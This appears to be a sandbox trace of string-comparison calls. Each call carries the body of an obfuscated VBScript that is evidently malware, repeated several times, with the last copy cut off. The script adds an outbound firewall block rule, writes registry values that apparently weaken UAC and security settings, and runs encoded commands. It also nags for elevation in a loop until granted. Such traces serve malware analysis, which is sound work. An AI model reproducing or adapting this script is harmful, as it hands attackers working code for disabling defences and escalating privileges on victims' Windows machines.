bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0223.026] wcsncmp (_String1=">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 49 [0223.026] wcsncmp (_String1="\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0223.026] wcsncmp (_String1="\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.026] wcsncmp (_String1="\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.027] wcsncmp (_String1="newRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = 